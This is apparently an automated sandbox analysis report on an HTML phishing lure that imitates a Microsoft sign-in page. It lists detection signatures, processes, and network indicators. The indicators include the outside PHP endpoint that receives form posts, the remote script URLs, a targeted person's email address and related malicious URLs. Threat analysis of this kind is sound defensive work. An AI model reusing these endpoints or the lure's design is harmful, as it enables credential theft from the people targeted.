Edit tour

Windows Analysis Report
RemittanceCopy389.html

Overview

General Information

Sample name:	RemittanceCopy389.html
Analysis ID:	1467215
MD5:	b674f6e96d065f0c1814e58a53ba2ce4
SHA1:	b15dca0f94736c9c1a905235647423442feab63f
SHA256:	3eecc080c42c38c3776d442d58c8975a2e36956acafec76d407a6fde7b759d76
Infos:

Detection

HTMLPhisher

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish10

Detected javascript redirector / loader

HTML Script injector detected

HTML document with suspicious name

HTML document with suspicious title

HTML file submission containing password form

HTML page contains suspicious base64 encoded javascript

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Detected hidden input values containing email addresses (often used in phishing pages)

Detected non-DNS traffic on DNS port

HTML body contains password input but no form action

HTML body with high number of embedded images detected

HTML page contains hidden URLs or javascript code

HTML title does not match URL

IP address seen in connection with other malware

Invalid 'forgot password' link found

JA3 SSL client fingerprint seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 2104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\RemittanceCopy389.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1948,i,4964140377372381568,1844792585278010681,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
1.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTTP traffic detected: POST /wp-ad/c188fdc.php HTTP/1.1Host: abbalandscape.infoConnection: keep-aliveContent-Length: 37sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chromecache_137.2.dr	String found in binary or memory: http://fontawesome.io
Source: chromecache_137.2.dr	String found in binary or memory: http://fontawesome.io/license

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54381
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54381 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49771 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: RemittanceCopy389.html

Initial sample: remit

Source: classification engine

Classification label: mal96.phis.winHTML@31/17@14/12

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\RemittanceCopy389.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1948,i,4964140377372381568,1844792585278010681,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1948,i,4964140377372381568,1844792585278010681,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next

Source: Window Recorder

Window detected: More than 3 window changes detected

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html

HTTP Parser: file:///C:/Users/user/Desktop/RemittanceCopy389.html

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
http://fontawesome.io	0%	URL Reputation	safe
https://code.jquery.com/jquery-3.1.1.min.js	0%	URL Reputation	safe
http://fontawesome.io/license	0%	URL Reputation	safe
https://rounded-screeching-script.glitch.me/set.js	0%	Avira URL Cloud	safe
https://abbalandscape.info/wp-ad/c188fdc.php	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/RemittanceCopy389.html	0%	Avira URL Cloud	safe
https://rounded-screeching-script.glitch.me/dats.js	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/RemittanceCopy389.html#	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
rounded-screeching-script.glitch.me	44.197.227.46	true	false	unknown
s-part-0016.t-0009.t-msedge.net	13.107.246.44	true	false	unknown
code.jquery.com	151.101.130.137	true	false	unknown
cdnjs.cloudflare.com	104.17.24.14	true	false	unknown
www.google.com	216.58.206.68	true	false	unknown
abbalandscape.info	185.244.151.84	true	false	unknown
s-part-0032.t-0009.t-msedge.net	13.107.246.60	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://rounded-screeching-script.glitch.me/dats.js	false	Avira URL Cloud: safe	unknown
https://rounded-screeching-script.glitch.me/set.js	false	Avira URL Cloud: safe	unknown
https://abbalandscape.info/wp-ad/c188fdc.php	false	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/RemittanceCopy389.html#	true	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/RemittanceCopy389.html	true	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css	false	Avira URL Cloud: safe	unknown
https://code.jquery.com/jquery-3.1.1.min.js	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://fontawesome.io	chromecache_137.2.dr	false	URL Reputation: safe	unknown
http://fontawesome.io/license	chromecache_137.2.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
44.197.227.46	rounded-screeching-script.glitch.me	United States	14618	AMAZON-AESUS	false
13.107.246.44	s-part-0016.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.60	s-part-0032.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
151.101.130.137	code.jquery.com	United States	54113	FASTLYUS	false
216.58.206.68	www.google.com	United States	15169	GOOGLEUS	false
185.244.151.84	abbalandscape.info	Netherlands	60117	HSAE	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.164	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
192.168.2.6
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467215
Start date and time:	2024-07-03 21:19:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RemittanceCopy389.html
Detection:	MAL
Classification:	mal96.phis.winHTML@31/17@14/12
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 216.58.206.67, 108.177.15.84, 216.58.206.46, 34.104.35.123, 2.19.126.163, 192.229.221.95, 172.217.16.202, 172.217.23.106, 142.250.186.42, 142.250.185.234, 216.58.206.74, 142.250.184.202, 142.250.185.74, 172.217.18.10, 142.250.186.74, 142.250.181.234, 142.250.186.106, 142.250.184.234, 216.58.206.42, 142.250.185.106, 142.250.186.170, 142.250.186.138, 142.250.185.174
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: RemittanceCopy389.html

Input	Output
URL: file:///C:/Users/user/Desktop/RemittanceCopy389.html Model: Perplexity: mixtral-8x7b-instruct	{"loginform": true,"urgency": false,"captcha": false,"reasons": ["The title of the webpage, 'Sign in to Best Productivity Provider!', explicitly mentions the need to sign in, indicating the presence of a login form.","The text, 'Microsoft Sign in to continue to Out&k tracy.durrance@mainstreetcbf.com', contains the phrase 'Sign in' and refers to a specific email address, suggesting that the user is required to sign in to continue, which confirms the presence of a login form."]}
Title: Sign in to Best Productivity Provider! OCR: Microsoft Sign in to continue to Out&k tracy.durrance@mainstreetcbf.com Can't access your account? Next Terms & Conditions Crx)kie Privacy
URL: file:///C:/Users/user/Desktop/RemittanceCopy389.html# Model: Perplexity: mixtral-8x7b-instruct	{"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage has a title 'Sign in to Best Productivity Provider!' which explicitly requests sensitive information such as a username and password.","The text 'Try another, or get a new Microsoft account.' suggests the creation of a new account, implying the presence of a login form."]}
Title: Sign in to Best Productivity Provider! OCR: a Microsoft Sign in to continue to Out&k We couldn't find an account with that username. Try another, or get a new Microsoft account. tracy.durrance@mainstreetcbf.com Can't access your account? Next Terms & Conditions Crx)kie Privacy
URL: file:///C:/Users/user/Desktop/RemittanceCopy389.html Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Microsoft", "phishing": true, "suspicious_domain": true, "has_prominent_loginform": true, "has_captcha": false, "setechniques": true, "has_suspicious_link": true, "legitmate_domain": "microsoft.com", "reasons": "The URL 'file:///C:/Users/user/Desktop/RemittanceCopy389.html' is a local file path, which is highly suspicious and not typical for legitimate websites. The page mimics a Microsoft login page, which is a common target for phishing attacks. The email domain 'mainstreetcbf.com' does not match the legitimate Microsoft domain. The presence of a prominent login form and the use of social engineering techniques to mimic a legitimate brand further indicate that this is a phishing attempt."}

URL: file:///C:/Users/user/Desktop/RemittanceCopy389.html# Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Microsoft", "phishing": true, "suspicious_domain": true, "has_prominent_loginform": true, "has_captcha": false, "setechniques": true, "has_suspicious_link": true, "legitmate_domain": "microsoft.com", "reasons": "The URL 'file:///C:/Users/user/Desktop/RemittanceCopy389.html#' is a local file path, which is highly suspicious for a legitimate login page. Legitimate Microsoft login pages would be hosted on the 'microsoft.com' domain. The image shows a login form that closely resembles Microsoft's login page, which is a common social engineering technique used in phishing attacks. Additionally, the presence of a prominent login form and a suspicious link ('Can't access your account?') further indicate phishing. Therefore, this site is highly likely to be a phishing site."}

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.17.24.14	http://vtaurl.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
104.17.24.14	http://Voyages.CNTraveler.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
44.197.227.46	http://www.evernote.com/shard/s371/sh/f041cc04-2eb8-11e1-1279-c0c24914207a/LWhD3rgdQ5xR5t--iDOJ7P-MUkYVUhgRq62dC8LVzLZOnctWRKJm5hEzqg	Get hash	malicious	HTMLPhisher	Browse
44.197.227.46	https://www.evernote.com/shard/s371/sh/f041cc04-2eb8-11e1-1279-c0c24914207a/LWhD3rgdQ5xR5t--iDOJ7P-MUkYVUhgRq62dC8LVzLZOnctWRKJm5hEzqg	Get hash	malicious	HTMLPhisher	Browse
13.107.246.44	https://pub-fb608504b57048a1b1ca54c74dbf132d.r2.dev/rint.html?odwyerrealty	Get hash	malicious	HTMLPhisher	Browse
	https://kawak.com.co	Get hash	malicious	Unknown	Browse
	https://www.exp2links2.net/my-subscription?utm_medium=email&utm_source=customer_email&utm_campaign=rnw_all_en_preexpiry-reminder-12m-15m-d3b_var&utm_content=renew-now-top	Get hash	malicious	Unknown	Browse
	PUGPDU-64096.docx	Get hash	malicious	HTMLPhisher	Browse
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse
	https://5ab5.ndpcrn.workers.dev/?onsc_lammy	Get hash	malicious	Unknown	Browse
	call_Playback_vertexone.net.html	Get hash	malicious	HTMLPhisher	Browse
	umcu.org.html	Get hash	malicious	HTMLPhisher	Browse
	https://www.ocenit.cl/ocenit.html	Get hash	malicious	Unknown	Browse
13.107.246.60	URBAN CORPS.pdf	Get hash	malicious	Unknown	Browse
	23eb97f4-980c-745d-c5e2-6fdb70189e48.eml	Get hash	malicious	HTMLPhisher	Browse
	https://sharesync.serverdata.net/us/s/kQGbuGpOyjwFkYowji449I003d1010	Get hash	malicious	Unknown	Browse
	https://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==	Get hash	malicious	HTMLPhisher	Browse
	https://m.exactag.com/ai.aspx?tc=d9177038bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atheannapolis250.org%2Fwinner%2F14136%2F%2FYnJhbndlbGwubW9mZmF0QGtwcy5jb20=	Get hash	malicious	HTMLPhisher	Browse
	pago pendientes.xls	Get hash	malicious	Unknown	Browse
	457525.xls	Get hash	malicious	Unknown	Browse
	https://emea.dcv.ms/xAUEwUn0yq&c=E,1,toHboUmwDMlhwr-wc7dBvpYkcIiHsLy6ICiYedy6zqFMHJPZP4VPyK8zV2e78vqw1ZiSYyf8djJ0Qg64xCBVUCvFvYwJhqpWb_urHJ65A88aoiyybtSIFaPo&typo=1	Get hash	malicious	Unknown	Browse
	https://pub-9445ce0d74714d1c934c51ffcf83c3f2.r2.dev/slnt.html?nycsbs	Get hash	malicious	HTMLPhisher	Browse
	The Siedenburg Group #24-051-553861 Project.pdf	Get hash	malicious	Unknown	Browse
151.101.130.137	http://site9613885.92.webydo.com/?v=1	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.2.min.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0016.t-0009.t-msedge.net	https://pub-fb608504b57048a1b1ca54c74dbf132d.r2.dev/rint.html?odwyerrealty	Get hash	malicious	HTMLPhisher	Browse	13.107.246.44
	https://kawak.com.co	Get hash	malicious	Unknown	Browse	13.107.246.44
	https://linestar-my.sharepoint.com/:f:/g/personal/crystal_linestar_ca/EgH5VvMfUqxCqthSlNI4dqsBrhZRILeELmLLYOjYesvYkg?e=AAEzrH&xsdata=MDV8MDJ8amFzb25zQHJvd21hcmsuY29tfGYyMzYyMTUzODQzNTRmMDQ4YTZlMDhkYzlhOThmYzRifGU3ODFmNDMxYjI1YTRhZDQ4MDYzYzQ2MGZhMGYwNTkyfDB8MHw2Mzg1NTUyMjkxNDY4MDA5NDN8VW5rbm93bnxUV0ZwYkdac2IzZDhleUpXSWpvaU1DNHdMakF3TURBaUxDSlFJam9pVjJsdU16SWlMQ0pCVGlJNklrMWhhV3dpTENKWFZDSTZNbjA9fDB8fHw%3d&sdata=eHJQM1U2eTh2K29qQjIyQmFFMWRLUFN5Tm5kdHdhRTRKVDA0Nmo1dnYrST0%3d	Get hash	malicious	HTMLPhisher	Browse	13.107.246.44
	https://www.exp2links2.net/my-subscription?utm_medium=email&utm_source=customer_email&utm_campaign=rnw_all_en_preexpiry-reminder-12m-15m-d3b_var&utm_content=renew-now-top	Get hash	malicious	Unknown	Browse	13.107.246.44
	PUGPDU-64096.docx	Get hash	malicious	HTMLPhisher	Browse	13.107.246.44
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.44
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.44
	https://5ab5.ndpcrn.workers.dev/?onsc_lammy	Get hash	malicious	Unknown	Browse	13.107.246.44
	call_Playback_vertexone.net.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.44
	umcu.org.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.44
s-part-0032.t-0009.t-msedge.net	URBAN CORPS.pdf	Get hash	malicious	Unknown	Browse	13.107.246.60
	23eb97f4-980c-745d-c5e2-6fdb70189e48.eml	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://app.box.com/s/0818uk4femepnk27set00nsfufvakx91	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://sharesync.serverdata.net/us/s/kQGbuGpOyjwFkYowji449I003d1010	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://m.exactag.com/ai.aspx?tc=d9177038bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atheannapolis250.org%2Fwinner%2F14136%2F%2FYnJhbndlbGwubW9mZmF0QGtwcy5jb20=	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	pago pendientes.xls	Get hash	malicious	Unknown	Browse	13.107.246.60
	457525.xls	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://emea.dcv.ms/xAUEwUn0yq&c=E,1,toHboUmwDMlhwr-wc7dBvpYkcIiHsLy6ICiYedy6zqFMHJPZP4VPyK8zV2e78vqw1ZiSYyf8djJ0Qg64xCBVUCvFvYwJhqpWb_urHJ65A88aoiyybtSIFaPo&typo=1	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://pub-9445ce0d74714d1c934c51ffcf83c3f2.r2.dev/slnt.html?nycsbs	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
